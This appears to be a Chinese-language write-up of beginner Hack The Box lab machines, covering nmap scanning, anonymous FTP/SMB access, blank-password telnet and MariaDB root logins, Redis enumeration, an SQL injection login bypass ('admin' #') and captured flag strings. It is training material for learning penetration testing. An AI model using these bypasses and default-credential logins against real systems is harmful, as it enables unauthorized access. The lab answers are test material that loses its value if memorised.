TIER 0

在第一层,您将获得网络安全渗透测试领域的基本技能。您将首先学习如何匿名连接到各种服务,例如 FTP、SMB、Telnet、Rsync 和 RDP。接下来,您将发现 Nmap 的强大功能,Nmap 是一个有价值的工具,用于识别目标系统上的开放端口,允许您评估其漏洞。最后,您将探索连接到 MongoDB 服务器,为您的渗透测试知识增加一个有价值的层次。这一层将为您进入网络安全领域奠定坚实的基础。

  • 了解如何匿名连接 FTP、SMB、Telnet、Rsync 和 RDP。

  • 了解如何使用 Nmap 识别开放端口。

  • 了解如何连接到 MongoDB 服务器。

Meow

Task 1

What does the acronym VM stand for?

首字母缩略词 VM 代表什么?

虚拟机

Virtual Machine

Task 2

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

我们使用什么工具与操作系统交互,以便通过命令行发出命令,例如启动我们的 VPN 连接的命令?它也被称为控制台或 shell。

终端

terminal

Task 3

What service do we use to form our VPN connection into HTB labs?

我们使用什么服务将 VPN 连接到HTB实验室?

openvpn

Task 4

What tool do we use to test our connection to the target with an ICMP echo request?

我们使用什么工具来测试与 ICMP 回显请求的目标的连接?

ping

Task 5

What is the name of the most common tool for finding open ports on a target?

在目标上查找开放端口的最常用工具的名称是什么?

nmap

Task 6

What service do we identify on port 23/tcp during our scans?

在扫描期间,我们在端口 23/tcp 上识别了什么服务?

nmap 10.129.39.120

image-20241205173456150

识别到telnet服务

Task 7

What username is able to log into the target over telnet with a blank password?

哪个用户名能够使用空密码通过 telnet 登录目标?

尝试root用户

image-20241205174018220

Submit Flag

Submit root flag

image-20241205174104251

Fawn

Task 1

What does the 3-letter acronym FTP stand for?

3 个字母的首字母缩写词 FTP 代表什么?

文件传输协议 - 维基百科,自由的百科全书

File Transfer Protocol

Task 2

Which port does the FTP service listen on usually?

FTP 服务通常侦听哪个端口?

21

Task 3

FTP sends data in the clear, without any encryption. What acronym is used for a later protocol designed to provide similar functionality to FTP but securely, as an extension of the SSH protocol?

FTP 以明文形式发送数据,无需任何加密。后来的协议使用什么首字母缩略词,旨在提供与 FTP 类似但安全的 SSH 协议的扩展?

SFTP

Task 4

What is the command we can use to send an ICMP echo request to test our connection to the target?

我们可以使用什么命令来发送 ICMP 回显请求来测试我们与目标的连接?

ping

Task 5

From your scans, what version is FTP running on the target?

从您的扫描中,FTP 在目标上运行的是什么版本?

执行nmap -sV 10.129.136.91,其中-sV为服务识别

image-20241206001337442

21端口开启ftp服务版本为vsftpd 3.0.3

Task 6

From your scans, what OS type is running on the target?

从您的扫描中,目标上运行的是哪种操作系统类型?

上图识别到系统为unix

Task 7

What is the command we need to run in order to display the ‘ftp’ client help menu?

我们需要运行什么命令才能显示 ‘ftp’ 客户端帮助菜单?

ftp -?

image-20241206002059631

Task 8

What is username that is used over FTP when you want to log in without having an account?

当您想在没有帐户的情况下登录时,通过 FTP 使用的用户名是什么?

FTP的匿名登录,用户名为anonymous

Task 9

What is the response code we get for the FTP message ‘Login successful’?

我们收到的 FTP 消息“登录成功”的响应代码是什么?

image-20241206002522521

230

Task 10

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.

我们可以使用几个命令来列出 FTP 服务器上可用的文件和目录。一个是 dir。另一种是在 Linux 系统上列出文件的常用方法是什么。

image-20241206002639621

ls

Task 11

What is the command used to download the file we found on the FTP server?

我们在 FTP 服务器上找到的文件用于下载的命令是什么?

get指令用于下载文件

image-20241206002905355

关于ftp指令

image-20241206003308482

ls		列举远程目录中的文件和目录
pwd		查看当前远程工作目录位置
cd		进入服务器指定的目录
lcd		改变本地目录
get		下载指定文件		get filename [newname]		
recv	下载指定文件		recv filename [newname]	
mget	下载多个文件		mget filename [filename ....]
newer	更新本地文件		 newer remote-file local-file [ ...]
put 	上传本地文件		put filename [newname]	
send	上传指定文件		send filename [newname]
delete 	删除远程文件		delete filename [newname]	
mdelete	删除多个远程文件   mdelete remote-files [ ...]
mkdir 	创建远程目录		mkdir directory
rmdir	删除远程目录		rmdir directory [newname]
rename 	重命名文件		 rename filename [newname]
chmod	更改远程文件权限
umask	显示远程文件默认权限

close	关闭连接,但不退出ftp
open	建立连接		  open ip [port]
disconnect	同close	
bye		退出ftp
!		退出ftp
quit	退出ftp
ascii	文件传送类型设置为ASCII

user	更换用户
status	查看ftp连接状态
rstatus	查看y'c状态

Submit Flag

Submit root flag

下载的文件位于当前目录下

035db21c881520061c53e0536e44f815

Dancing

Task 1

What does the 3-letter acronym SMB stand for?

3 个字母的首字母缩写词 SMB 代表什么?

服务器消息块(Server Message Block,缩写为SMB),又称网络文件共享系统(Common Internet File System,缩写为CIFS, /ˈsɪfs/),一种应用层网络传输协议,由微软开发,主要功能是使网络上的机器能够共享计算机文件打印机串行端口和通讯等资源。它也提供经认证的进程间通信机能。它主要用在装有Microsoft Windows的机器上,在这样的机器上被称为Microsoft Windows Network。

Task 2

What port does SMB use to operate at?

SMB 使用哪个端口运行?

与功能类似的网络文件系统(NFS)相比,NFS的消息格式是固定长度,而CIFS的消息格式大多数是可变长度,这增加了协议的复杂性。CIFS消息一般使用NetBIOSTCP协议发送,分别使用不同的端口139或445,目前倾向于使用445端口。CIFS的消息包括一个信头(32字节)和消息体(1个或多个,可变长)。

Task 3

What is the service name for port 445 that came up in our Nmap scan?

Nmap 扫描中出现的端口 445 的服务名称是什么?

image-20241208235131208

microsoft-ds

Task 4

What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?

我们可以用什么 ‘flag’ 或 ‘switch’ 来用 smbclient 工具来 “list” Dancing 上的可用份额?

smbclient类似于上个靶机的ftp指令,提供一种命令行使用交互式方式访问samba服务器的共享资源

smbclient -?

-L为列出shares,区分大小写

image-20241209003932820

-L

Task 5

How many shares are there on Dancing?

Dancing 上有多少个分享?

4

image-20241209003824244

Task 6

What is the name of the share we are able to access in the end with a blank password?

我们最终能够使用空白密码访问的共享的名称是什么?

后不带$即无密码

image-20241209005547091

WorkShares

Task 7

What is the command we can use within the SMB shell to download the files we find?

我们可以在 SMB shell 中使用什么命令来下载我们找到的文件?

指令和ftp差不多

image-20241209010331504

Submit Flag

Submit root flag

5f61c10dffbc77a704d76016a22f1664

Redeemer

Task 1

Which TCP port is open on the machine?

计算机上打开了哪个 TCP 端口?

御剑扫到6379

image-20241210020551343

Task 2

Which service is running on the port that is open on the machine?

计算机上打开的端口上运行的是哪个服务?

进一步扫描6379服务

image-20241210020710157

Task 3

What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database

Redis 是什么类型的数据库?从以下选项中进行选择:(i) 内存数据库,(ii) 传统数据库

Redis(Remote Dictionary Server)是一个使用ANSI C编写的支持网络、基于内存分布式、可选持久性键值对存储数据库。根据月度排行网站DB-Engines.com的数据,Redis是最流行的键值对存储数据库。

In-memory Database

Task 4

Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.

哪个命令行实用程序用于与 Redis 服务器交互?输入您要在终端中输入的程序名称,不带任何参数。

redis-cli

Task 5

Which flag is used with the Redis command-line utility to specify the hostname?

Redis 命令行实用程序使用哪个标志来指定主机名?

redis-cli 7.0.15

Usage: redis-cli [OPTIONS] [cmd [arg [arg ...]]]
  -h <hostname>      Server hostname (default: 127.0.0.1).
  -p <port>          Server port (default: 6379).
  -s <socket>        Server socket (overrides hostname and port).
  -a <password>      Password to use when connecting to the server.
                     You can also use the REDISCLI_AUTH environment
                     variable to pass this password more safely
                     (if both are used, this argument takes precedence).
  --user <username>  Used to send ACL style 'AUTH username pass'. Needs -a.
  --pass <password>  Alias of -a for consistency with the new --user option.
  --askpass          Force user to input password with mask from STDIN.
                     If this argument is used, '-a' and REDISCLI_AUTH
                     environment variable will be ignored.
  -u <uri>           Server URI.
  -r <repeat>        Execute specified command N times.
  -i <interval>      When -r is used, waits <interval> seconds per command.
                     It is possible to specify sub-second times like -i 0.1.
                     This interval is also used in --scan and --stat per cycle.
                     and in --bigkeys, --memkeys, and --hotkeys per 100 cycles.
  -n <db>            Database number.
  -2                 Start session in RESP2 protocol mode.
  -3                 Start session in RESP3 protocol mode.
  -x                 Read last argument from STDIN (see example below).
  -X                 Read <tag> argument from STDIN (see example below).
  -d <delimiter>     Delimiter between response bulks for raw formatting (default: \n).
  -D <delimiter>     Delimiter between responses for raw formatting (default: \n).
  -c                 Enable cluster mode (follow -ASK and -MOVED redirections).
  -e                 Return exit error code when command execution fails.
  --tls              Establish a secure TLS connection.
  --sni <host>       Server name indication for TLS.
  --cacert <file>    CA Certificate file to verify with.
  --cacertdir <dir>  Directory where trusted CA certificates are stored.
                     If neither cacert nor cacertdir are specified, the default
                     system-wide trusted root certs configuration will apply.
  --insecure         Allow insecure TLS connection by skipping cert validation.
  --cert <file>      Client certificate to authenticate with.
  --key <file>       Private key file to authenticate with.
  --tls-ciphers <list> Sets the list of preferred ciphers (TLSv1.2 and below)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string.
  --tls-ciphersuites <list> Sets the list of preferred ciphersuites (TLSv1.3)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string,
                     and specifically for TLSv1.3 ciphersuites.
  --raw              Use raw formatting for replies (default when STDOUT is
                     not a tty).
  --no-raw           Force formatted output even when STDOUT is not a tty.
  --quoted-input     Force input to be handled as quoted strings.
  --csv              Output in CSV format.
  --json             Output in JSON format (default RESP3, use -2 if you want to use with RESP2).
  --quoted-json      Same as --json, but produce ASCII-safe quoted strings, not Unicode.
  --show-pushes <yn> Whether to print RESP3 PUSH messages.  Enabled by default when
                     STDOUT is a tty but can be overridden with --show-pushes no.
  --stat             Print rolling stats about server: mem, clients, ...
  --latency          Enter a special mode continuously sampling latency.
                     If you use this mode in an interactive session it runs
                     forever displaying real-time stats. Otherwise if --raw or
                     --csv is specified, or if you redirect the output to a non
                     TTY, it samples the latency for 1 second (you can use
                     -i to change the interval), then produces a single output
                     and exits.
  --latency-history  Like --latency but tracking latency changes over time.
                     Default time interval is 15 sec. Change it using -i.
  --latency-dist     Shows latency as a spectrum, requires xterm 256 colors.
                     Default time interval is 1 sec. Change it using -i.
  --lru-test <keys>  Simulate a cache workload with an 80-20 distribution.
  --replica          Simulate a replica showing commands received from the master.
  --rdb <filename>   Transfer an RDB dump from remote server to local file.
                     Use filename of "-" to write to stdout.
 --functions-rdb <filename> Like --rdb but only get the functions (not the keys)
                     when getting the RDB dump file.
  --pipe             Transfer raw Redis protocol from stdin to server.
  --pipe-timeout <n> In --pipe mode, abort with error if after sending all data.
                     no reply is received within <n> seconds.
                     Default timeout: 30. Use 0 to wait forever.
  --bigkeys          Sample Redis keys looking for keys with many elements (complexity).
  --memkeys          Sample Redis keys looking for keys consuming a lot of memory.
  --memkeys-samples <n> Sample Redis keys looking for keys consuming a lot of memory.
                     And define number of key elements to sample
  --hotkeys          Sample Redis keys looking for hot keys.
                     only works when maxmemory-policy is *lfu.
  --scan             List all keys using the SCAN command.
  --pattern <pat>    Keys pattern when using the --scan, --bigkeys or --hotkeys
                     options (default: *).
  --quoted-pattern <pat> Same as --pattern, but the specified string can be
                         quoted, in order to pass an otherwise non binary-safe string.
  --intrinsic-latency <sec> Run a test to measure intrinsic system latency.
                     The test will run for the specified amount of seconds.
  --eval <file>      Send an EVAL command using the Lua script at <file>.
  --ldb              Used with --eval enable the Redis Lua debugger.
  --ldb-sync-mode    Like --ldb but uses the synchronous Lua debugger, in
                     this mode the server is blocked and script changes are
                     not rolled back from the server memory.
  --cluster <command> [args...] [opts...]
                     Cluster Manager command and arguments (see below).
  --verbose          Verbose mode.
  --no-auth-warning  Don't show warning message when using password on command
                     line interface.
  --help             Output this help and exit.
  --version          Output version and exit.

Cluster Manager Commands:
  Use --cluster help to list all available cluster manager commands.

Examples:
  cat /etc/passwd | redis-cli -x set mypasswd
  redis-cli -D "" --raw dump key > key.dump && redis-cli -X dump_tag restore key2 0 dump_tag replace < key.dump
  redis-cli -r 100 lpush mylist x
  redis-cli -r 100 -i 1 info | grep used_memory_human:
  redis-cli --quoted-input set '"null-\x00-separated"' value
  redis-cli --eval myscript.lua key1 key2 , arg1 arg2 arg3
  redis-cli --scan --pattern '*:12345*'

  (Note: when using --eval the comma separates KEYS[] from ARGV[] items)

When no command is given, redis-cli starts in interactive mode.
Type "help" in interactive mode for information on available commands
and settings.

-h

Task 6

Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?

连接到 Redis 服务器后,使用哪个命令来获取 Redis 服务器的信息和统计信息?

redis 命令手册

Redis 命令手册介绍了 Redis 常用键命令和数据类型命令,是目前最全的 Redis 命令手册。

键(Key)命令

Redis 是 key-value 型数据库,键(Key)命令是 Redis 中经常使用的命令。常用的键命令如下所示:

命令 描述
DEL 用于删除 key
DUMP 序列化给定 key ,并返回被序列化的值
EXISTS 检查给定 key 是否存在
EXPIRE 为给定 key 设置过期时间
EXPIREAT 用于为 key 设置过期时间,接受的时间参数是 UNIX 时间戳
PEXPIRE 设置 key 的过期时间,以毫秒计
PEXPIREAT 设置 key 过期时间的时间戳(unix timestamp),以毫秒计
KEYS 查找所有符合给定模式的 key
MOVE 将当前数据库的 key 移动到给定的数据库中
PERSIST 移除 key 的过期时间,key 将持久保持
PTTL 以毫秒为单位返回 key 的剩余的过期时间
TTL 以秒为单位,返回给定 key 的剩余生存时间(
RANDOMKEY 从当前数据库中随机返回一个 key
RENAME 修改 key 的名称
RENAMENX 仅当 newkey 不存在时,将 key 改名为 newkey
TYPE 返回 key 所储存的值的类型
String 命令

Strings(字符串)结构是 Redis 的基本数据类型,值value是字符串类型,常用命令:

命令 描述
SET 设置指定 key 的值
GET 获取指定 key 的值
GETRANGE 返回 key 中字符串值的子字符
GETSET 将给定 key 的值设为 value ,并返回 key 的旧值 ( old value )
GETBIT 对 key 所储存的字符串值,获取指定偏移量上的位 ( bit )
MGET 获取所有(一个或多个)给定 key 的值
SETBIT 对 key 所储存的字符串值,设置或清除指定偏移量上的位(bit)
SETEX 设置 key 的值为 value 同时将过期时间设为 seconds
SETNX 只有在 key 不存在时设置 key 的值
SETRANGE 从偏移量 offset 开始用 value 覆写给定 key 所储存的字符串值
STRLEN 返回 key 所储存的字符串值的长度
MSET 同时设置一个或多个 key-value 对
MSETNX 同时设置一个或多个 key-value 对
PSETEX 以毫秒为单位设置 key 的生存时间
INCR 将 key 中储存的数字值增一
INCRBY 将 key 所储存的值加上给定的增量值 ( increment )
INCRBYFLOAT 将 key 所储存的值加上给定的浮点增量值 ( increment )
DECR 将 key 中储存的数字值减一
DECRBY 将 key 所储存的值减去给定的减量值 ( decrement )
APPEND 将 value 追加到 key 原来的值的末尾
Hash 命令

Hash(哈希散列)是 Redis 基本数据类型,值value 中存储的是 hash 表。Hash 特别适合用于存储对象。常用的命令:

命令 说明
HDEL 用于删除哈希表中一个或多个字段
HEXISTS 用于判断哈希表中字段是否存在
HGET 获取存储在哈希表中指定字段的值
HGETALL 获取在哈希表中指定 key 的所有字段和值
HINCRBY 为存储在 key 中的哈希表指定字段做整数增量运算
HKEYS 获取存储在 key 中的哈希表的所有字段
HLEN 获取存储在 key 中的哈希表的字段数量
HSET 用于设置存储在 key 中的哈希表字段的值
HVALS 用于获取哈希表中的所有值
List 命令

List 是 Redis 中最常用数据类型。值value 中存储的是列表。:

命令 描述
BLPOP 移出并获取列表的第一个元素
BRPOP 移出并获取列表的最后一个元素
BRPOPLPUSH 从列表中弹出一个值,并将该值插入到另外一个列表中并返回它
LINDEX 通过索引获取列表中的元素
LINSERT 在列表的元素前或者后插入元素
LLEN 获取列表长度
LPOP 移出并获取列表的第一个元素
LPUSH 将一个或多个值插入到列表头部
LPUSHX 将一个值插入到已存在的列表头部
LRANGE 获取列表指定范围内的元素
LREM 移除列表元素
LSET 通过索引设置列表元素的值
LTRIM 对一个列表进行修剪(trim)
RPOP 移除并获取列表最后一个元素
RPOPLPUSH 移除列表的最后一个元素,并将该元素添加到另一个列表并返回
RPUSH 在列表中添加一个或多个值
RPUSHX 为已存在的列表添加值
Set 命令
命令 描述
SADD 向集合添加一个或多个成员
SCARD 获取集合的成员数
SDIFF 返回给定所有集合的差集
SDIFFSTORE 返回给定所有集合的差集并存储在 destination 中
SINTER 返回给定所有集合的交集
SINTERSTORE 返回给定所有集合的交集并存储在 destination 中
SISMEMBER 判断 member 元素是否是集合 key 的成员
SMEMBERS 返回集合中的所有成员
SMOVE 将 member 元素从 source 集合移动到 destination 集合
SPOP 移除并返回集合中的一个随机元素
SRANDMEMBER 返回集合中一个或多个随机数
SREM 移除集合中一个或多个成员
SUNION 返回所有给定集合的并集
SUNIONSTORE 所有给定集合的并集存储在 destination 集合中
SSCAN 迭代集合中的元素
Zset 命令

下表列出了 Redis 有序集合的基本命令

命令 描述
ZADD 向有序集合添加一个或多个成员,或者更新已存在成员的分数
ZCARD 获取有序集合的成员数
ZCOUNT 计算在有序集合中指定区间分数的成员数
ZINCRBY 有序集合中对指定成员的分数加上增量 increment
ZINTERSTORE 计算给定的一个或多个有序集的交集并将结果集存储在新的有序集合 key 中
ZLEXCOUNT 在有序集合中计算指定字典区间内成员数量
ZRANGE 通过索引区间返回有序集合成指定区间内的成员
ZRANGEBYLEX 通过字典区间返回有序集合的成员
ZRANGEBYSCORE 通过分数返回有序集合指定区间内的成员
ZRANK 返回有序集合中指定成员的索引
ZREM 移除有序集合中的一个或多个成员
ZREMRANGEBYLEX 移除有序集合中给定的字典区间的所有成员
ZREMRANGEBYRANK 移除有序集合中给定的排名区间的所有成员
ZREMRANGEBYSCORE 移除有序集合中给定的分数区间的所有成员
ZREVRANGE 返回有序集中指定区间内的成员,通过索引,分数从高到底
ZREVRANGEBYSCORE 返回有序集中指定分数区间内的成员,分数从高到低排序
ZREVRANK 返回有序集合中指定成员的排名,有序集成员按分数值递减(从大到小)排序
ZSCORE 返回有序集中,成员的分数值
ZUNIONSTORE 计算一个或多个有序集的并集,并存储在新的 key 中
ZSCAN 迭代有序集合中的元素(包括元素成员和元素分值)
Redis 管理 redis 服务相关命令

下表列出了管理 redis 服务相关的命令

命令 描述
BGREWRITEAOF 异步执行一个 AOF(AppendOnly File) 文件重写操作
BGSAVE 在后台异步保存当前数据库的数据到磁盘
CLIENT 关闭客户端连接
CLIENT LIST 获取连接到服务器的客户端连接列表
CLIENT GETNAME 获取连接的名称
CLIENT PAUSE 在指定时间内终止运行来自客户端的命令
CLIENT SETNAME 设置当前连接的名称
CLUSTER SLOTS 获取集群节点的映射数组
COMMAND 获取 Redis 命令详情数组
COMMAND COUNT 获取 Redis 命令总数
COMMAND GETKEYS 获取给定命令的所有键
TIME 返回当前服务器时间
COMMAND INFO 获取指定 Redis 命令描述的数组
CONFIG GET 获取指定配置参数的值
CONFIG REWRITE 修改 redis.conf 配置文件
CONFIG SET 修改 redis 配置参数,无需重启
CONFIG RESETSTAT 重置 INFO 命令中的某些统计数据
DBSIZE 返回当前数据库的 key 的数量
DEBUG OBJECT 获取 key 的调试信息
DEBUG SEGFAULT 让 Redis 服务崩溃
FLUSHALL 删除所有数据库的所有 key
FLUSHDB 删除当前数据库的所有 key
INFO 获取 Redis 服务器的各种信息和统计数值
LASTSAVE 返回最近一次 Redis 成功将数据保存到磁盘上的时间
MONITOR 实时打印出 Redis 服务器接收到的命令,调试用
ROLE 返回主从实例所属的角色
SAVE 异步保存数据到硬盘
SHUTDOWN 异步保存数据到硬盘,并关闭服务器
SLAVEOF 将当前服务器转变从属服务器(slave server)
SLOWLOG 管理 redis 的慢日志
SYNC 用于复制功能 ( replication ) 的内部命令
Redis 发布订阅命令

下表列出了列表相关命令:

命令 描述
PSUBSCRIBE 订阅一个或多个符合给定模式的频道。
PUBSUB 查看订阅与发布系统状态。
PUBLISH 将信息发送到指定的频道。
PUNSUBSCRIBE 退订所有给定模式的频道。
SUBSCRIBE 订阅给定的一个或多个频道的信息。
UNSUBSCRIBE 指退订给定的频道。
Redis 事务命令

下表列出了 Redis 事务的相关命令

命令 描述
DISCARD 取消事务,放弃执行事务块内的所有命令
EXEC 执行所有事务块内的命令
MULTI 标记一个事务块的开始
UNWATCH 取消 WATCH 命令对所有 key 的监视
WATCH 监视一个(或多个) key
Redis 连接命令

下表列出了用于 Redis 连接相关的命令

命令 描述
AUTH password 验证密码是否正确
ECHO message 打印字符串
PING 查看服务是否运行
QUIT 关闭当前连接
SELECT index 切换到指定的数据库
Redis 脚本 命令
命令 描述
SCRIPT KILL 杀死当前正在运行的 Lua 脚本。
SCRIPT LOAD 将脚本 script 添加到脚本缓存中,但并不立即执行这个脚本。
EVAL 执行 Lua 脚本。
EVALSHA 执行 Lua 脚本。
SCRIPT EXISTS 查看指定的脚本是否已经被保存在缓存当中。
SCRIPT FLUSH 从脚本缓存中移除所有脚本。
Redis HyperLogLog 命令
命令 描述
PFGMERGE 将多个 HyperLogLog 合并为一个 HyperLogLog
PFADD 添加指定元素到 HyperLogLog 中。
PFCOUNT 返回给定 HyperLogLog 的基数估算值。
Redis 发布订阅 命令
命令 描述
UNSUBSCRIBE 指退订给定的频道。
SUBSCRIBE 订阅给定的一个或多个频道的信息。
PUBSUB 查看订阅与发布系统状态。
PUNSUBSCRIBE 退订所有给定模式的频道。
PUBLISH 将信息发送到指定的频道。
PSUBSCRIBE 订阅一个或多个符合给定模式的频道。
Redis 地理位置(geo) 命令
命令 描述
GEOHASH 返回一个或多个位置元素的 Geohash 表示
GEOPOS 从key里返回所有给定位置元素的位置(经度和纬度)
GEODIST 返回两个给定位置之间的距离
GEORADIUS 以给定的经纬度为中心, 找出某一半径内的元素
GEOADD 将指定的地理空间位置(纬度、经度、名称)添加到指定的key中
GEORADIUSBYMEMBER 找出位于指定范围内的元素,中心点是由给定的位置元素决定

Task 7

What is the version of the Redis server being used on the target machine?

目标计算机上正在使用的 Redis 服务器版本是什么?

nmap服务识别

image-20241210023214894

或redis-cli交互info

image-20241210023247605

Task 8

Which command is used to select the desired database in Redis?

在 Redis 中使用哪个命令选择所需的数据库?

select

Task 9

How many keys are present inside the database with index 0?

索引为 0 的数据库中有多少个键?

info keyspace

image-20241210171014375

Task 10

Which command is used to obtain all the keys in a database?

哪个命令用于获取数据库中的所有密钥?

keys *

image-20241210171910858

Submit Flag

Submit root flag

image-20241210171950438

TIER 1

在第二层,您将更深入地研究网络安全渗透测试的世界,重点是适合初学者的 Web 开发技术。您将了解 SQL 注入、服务器端模板注入、远程文件包含的基础知识,并掌握如何有效地使用 Web/Reverse Shell。在第一层的知识基础上,您将应用这些技术来利用前面展示的各种服务,确保亲身体验其漏洞。

此外,您还将学习如何导航 Jenkins(一种流行的自动化服务器)以登录并上传 Groovy Shell 脚本,这是一项用于渗透测试的宝贵技能。最后,您将通过了解如何将文件上传到 S3 存储桶来完善您的专业知识,为您提供在网络安全领域脱颖而出的全面技能。此层级可让您在渗透测试之旅中更进一步。

  • 学习基本的 Web 利用技术,例如 SQL 注入、服务器端模板注入、远程文件包含以及如何使用 Web/Reverse Shell。
  • 使用上一层中展示的服务进行开发。
  • 了解如何登录 Jenkins 并上传 Groovy Shell 脚本。
  • 了解如何将文件上传到 S3 存储桶。

Appointment

Task 1

What does the acronym SQL stand for?

首字母缩略词 SQL 代表什么?

SQL,(Structured Query Language结构化查询语言)是一种特定目的编程语言,用于管理关系数据库管理系统(RDBMS),或在关系流数据管理系统(RDSMS)中进行流处理。

Structured Query Language

Task 2

What is one of the most common type of SQL vulnerabilities?

最常见的 SQL 漏洞类型之一是什么?

sql注入

SQL Injection

Task 3

What is the 2021 OWASP Top 10 classification for this vulnerability?

此漏洞的 2021 年 OWASP Top 10 分类是什么?

A03 Injection - OWASP Top 10:2021

A03:2021-Injection

Task 4

What does Nmap report as the service and version that are running on port 80 of the target?

Nmap 将什么报告为目标端口 80 上运行的服务和版本?

image-20241210180653163

Apache httpd 2.4.38 ((Debian))

Task 5

What is the standard port used for the HTTPS protocol?

HTTPS 协议使用的标准端口是什么?

443

Task 6

What is a folder called in web-application terminology?

在 Web 应用程序术语中,文件夹叫什么?

目录

Directory

Task 7

What is the HTTP response code is given for ‘Not Found’ errors?

“未找到”错误的 HTTP 响应代码是什么?

404

Task 8

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?

Gobuster 是一种用于在 Web 服务器上暴力破解目录的工具。我们对 Gobuster 使用什么开关来指定我们要发现目录,而不是子域?

dir

Usage:
  gobuster [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  dir         Uses directory/file enumeration mode
  dns         Uses DNS subdomain enumeration mode
  fuzz        Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
  gcs         Uses gcs bucket enumeration mode
  help        Help about any command
  s3          Uses aws bucket enumeration mode
  tftp        Uses TFTP enumeration mode
  version     shows the current version
  vhost       Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
  -h, --help                  help for gobuster
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defaults to 0)

Use "gobuster [command] --help" for more information about a command.

Task 9

What single character can be used to comment out the rest of a line in MySQL?

Task 10

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

如果用户输入未得到仔细处理,则可能会被解释为注释。使用评论以管理员身份登录,而无需知道密码。返回的网页上的第一个单词是什么?

admin' #

image-20241210184711111

Congratulations

Submit Flag

Submit root flag

e3d0796d002a446c0e622226f42e9672

Sequel

Task 1

During our scan, which port do we find serving MySQL?

在我们的扫描过程中,我们发现哪个端口正在为 MySQL 提供服务?

3306

image-20241210190130397

Task 2

What community-developed MySQL version is the target running?

目标运行的是哪个社区开发的 MySQL 版本?

MariaDB

image-20241210190516867

Task 3

When using the MySQL command line client, what switch do we need to use in order to specify a login username?

使用 MySQL 命令行客户端时,我们需要使用什么开关来指定登录用户名?

-u

Task 4

Which username allows us to log into this MariaDB instance without providing a password?

哪个用户名允许我们在不提供密码的情况下登录这个 MariaDB 实例?

root

image-20241210191330618

Task 5

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

在 SQL 中,我们可以使用什么符号在查询中指定要在表中显示所有内容?

Task 6

In SQL, what symbol do we need to end each query with?

在 SQL 中,我们需要用什么符号来结束每个查询?

;

Task 7

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?

此 MySQL 实例中有三个数据库,它们在所有 MySQL 实例中都是通用的。此主机独有的第四个名称是什么?

image-20241210191942648

Submit Flag

Submit root flag

image-20241210192019458

7b4bec00d1a39e3dd4e021ec3d915da8

Crocodile

Task 1

What Nmap scanning switch employs the use of default scripts during a scan?

哪个 Nmap 扫描开关在扫描期间使用默认脚本?

-sC

Task 2

What service version is found to be running on port 21?

发现端口 21 上运行的服务版本是什么?

image-20241210192357046

image-20241210192625216

Task 3

What FTP code is returned to us for the “Anonymous FTP login allowed” message?

对于“允许匿名 FTP 登录”消息,将返回给我们什么 FTP 代码?

230

Task 4

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

使用 ftp 客户端连接到 FTP 服务器后,当提示匿名登录时,我们提供什么用户名?

anonymous

Task 5

After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

匿名连接到 FTP 服务器后,我们可以使用什么命令来下载我们在 FTP 服务器上找到的文件?

get

Task 6

What is one of the higher-privilege sounding usernames in ‘allowed.userlist’ that we download from the FTP server?

我们从 FTP 服务器下载的 ‘allowed.userlist’ 中听起来权限较高的用户名之一是什么?

admin

image-20241210193527491

Task 7

What version of Apache HTTP Server is running on the target host?

目标主机上运行的是什么版本的 Apache HTTP Server?

Apache HTTpd 2.4.41

image-20241210193929430

image-20241210193908091

Task 8

What switch can we use with Gobuster to specify we are looking for specific filetypes?

我们可以在 Gobuster 中使用什么开关来指定我们正在寻找特定的文件类型?

-x

┌──(root㉿7)-[~]
└─# gobuster dir -h
Uses directory/file enumeration mode

Usage:
  gobuster dir [flags]

Flags:
  -f, --add-slash                         Append / to each request
      --client-cert-p12 string            a p12 file to use for options TLS client certificates
      --client-cert-p12-password string   the password to the p12 file
      --client-cert-pem string            public key in PEM format for optional TLS client certificates
      --client-cert-pem-key string        private key in PEM format for optional TLS client certificates (this key needs to have no password)
  -c, --cookies string                    Cookies to use for the requests
  -d, --discover-backup                   Also search for backup files by appending multiple backup extensions
      --exclude-length string             exclude the following content lengths (completely ignores the status). You can separate multiple lengths by comma and it also supports ranges like 203-206
  -e, --expanded                          Expanded mode, print full URLs
  -x, --extensions string                 File extension(s) to search for
  -X, --extensions-file string            Read file extension(s) to search from the file
  -r, --follow-redirect                   Follow redirects
  -H, --headers stringArray               Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
  -h, --help                              help for dir
      --hide-length                       Hide the length of the body in the output
  -m, --method string                     Use the following HTTP method (default "GET")
      --no-canonicalize-headers           Do not canonicalize HTTP header names. If set header names are sent as is.
  -n, --no-status                         Don't print status codes
  -k, --no-tls-validation                 Skip TLS certificate verification
  -P, --password string                   Password for Basic Auth
      --proxy string                      Proxy to use for requests [http(s)://host:port] or [socks5://host:port]
      --random-agent                      Use a random User-Agent string
      --retry                             Should retry on request timeout
